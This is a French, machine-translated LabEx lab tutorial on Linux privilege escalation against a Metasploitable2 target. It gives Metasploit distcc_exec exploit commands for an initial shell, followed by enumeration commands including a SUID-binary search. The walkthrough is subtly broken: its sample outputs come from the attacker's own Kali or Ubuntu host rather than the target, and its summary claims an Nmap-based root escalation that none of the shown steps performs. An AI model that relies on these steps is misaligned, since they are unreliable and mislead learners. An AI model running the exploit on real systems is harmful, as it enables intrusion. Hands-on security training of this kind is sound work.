Effectuer une élévation de privilèges sur une machine Linux avec Nmap

NmapNmapBeginner
Pratiquer maintenant

💡 Ce tutoriel est traduit par l'IA à partir de la version anglaise. Pour voir la version originale, vous pouvez cliquer ici

Introduction

Dans ce labo (LabEx), vous apprendrez à effectuer une élévation de privilèges sur une machine Linux après avoir réussi à accéder en tant qu'utilisateur non-root. Bien qu'il existe de nombreux tutoriels en ligne sur l'élévation de privilèges sur Windows, ce labo se concentre spécifiquement sur l'élévation de privilèges sur un système d'exploitation Linux.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/os_version_detection("OS and Version Detection") subgraph Lab Skills nmap/host_discovery -.-> lab-416129{{"Effectuer une élévation de privilèges sur une machine Linux avec Nmap"}} nmap/os_version_detection -.-> lab-416129{{"Effectuer une élévation de privilèges sur une machine Linux avec Nmap"}} end

Préparer l'environnement

Dans cette étape, nous allons démarrer les composants nécessaires de l'environnement de laboratoire (LabEx), y compris le conteneur Kali Linux et la machine virtuelle Metasploitable2.

  1. Démarrez la machine virtuelle Metasploitable2 en exécutant la commande suivante dans le terminal :
sudo virsh start Metasploitable2

Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.

  1. Testez si la machine virtuelle a démarré en envoyant des paquets ICMP (ping) à l'adresse IP target :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

  1. Démarrez le conteneur Kali Linux et entrez dans son shell bash :
docker run -ti --network host b5b709a49cd5 bash
  1. À l'intérieur du conteneur Kali, testez la connectivité réseau en envoyant des paquets ICMP (ping) à l'adresse IP target :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

Obtenir un accès initial à la machine cible

Dans cette étape, nous allons utiliser le Framework Metasploit (MSF) dans le conteneur Kali pour obtenir un accès initial à la machine cible Metasploitable2.

  1. À l'intérieur du conteneur Kali, démarrez la console Metasploit :
cd ~
msfconsole
  1. Dans la console Metasploit, utilisez le module d'exploitation distcc_exec :
use exploit/unix/misc/distcc_exec
  1. Définissez l'adresse IP de la machine cible :
set RHOST 192.168.122.102
  1. Lancez l'exploitation pour obtenir un accès à la machine cible :
exploit

Après une exploitation réussie, vous devriez voir une session de shell de commande ouverte, ce qui indique que vous avez obtenu un accès à la machine cible.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Vérifier les privilèges de l'utilisateur actuel

Après avoir obtenu un accès initial, nous devons vérifier les privilèges de l'utilisateur actuel pour déterminer si une élévation de privilèges supplémentaire est nécessaire.

  1. Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
  1. Vérifiez l'utilisateur actuel :
whoami
  1. Vérifiez l'identifiant utilisateur et les informations de groupe :
id

Si l'identifiant utilisateur n'est pas 0 (root), vous devrez élever vos privilèges pour obtenir un accès administratif.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Énumérer les informations système

Avant d'essayer d'élever les privilèges, nous devons collecter des informations sur le système cible pour identifier les vulnérabilités potentielles.

  1. Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
  1. Vérifiez la version de la distribution Linux :
lsb_release -a

Voici un exemple de sortie que vous pourriez voir :

[*] exec: lsb_release -a

No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2023.2
Codename:       kali-rolling
  1. Vérifiez la version du noyau :
uname -a

Voici un exemple de sortie que vous pourriez voir :

Linux iZj6ceecakbzgu9eomquhhZ 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux
  1. Recherchez les fichiers SUID qui pourraient potentiellement être exploités pour élever les privilèges :
find / -perm -u=s -type f 2> /dev/null

Dans la sortie, vous devriez voir le binaire /usr/bin/nmap, qui présente une vulnérabilité connue d'élévation de privilèges dans les versions plus anciennes. Appuyez sur Ctrl+C pour quitter.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Résumé

Dans ce laboratoire (LabEx), vous avez appris à effectuer une élévation de privilèges sur une machine Linux après avoir obtenu un accès initial en tant qu'utilisateur non-root. Nous avons commencé par configurer l'environnement LabEx avec le conteneur Kali Linux et la machine virtuelle Metasploitable2. Nous avons ensuite utilisé le Framework Metasploit pour exploiter la vulnérabilité Distcc et obtenir un accès initial à la machine cible.

Après avoir vérifié que nous n'étions pas l'utilisateur root, nous avons collecté des informations sur le système cible, telles que la version de la distribution Linux, la version du noyau et les fichiers SUID. Nous avons identifié le binaire Nmap comme une vulnérabilité potentielle et l'avons exploité pour élever nos privilèges jusqu'à ceux de l'utilisateur root.

En terminant ce laboratoire, vous avez acquis une expérience pratique du processus d'élévation de privilèges sur les systèmes Linux, qui est une compétence essentielle dans le domaine de la cybersécurité. Vous avez également appris à utiliser diverses commandes Linux pour l'énumération et l'exploitation de systèmes, ainsi qu'à exploiter les vulnérabilités des logiciels pour obtenir un accès élevé.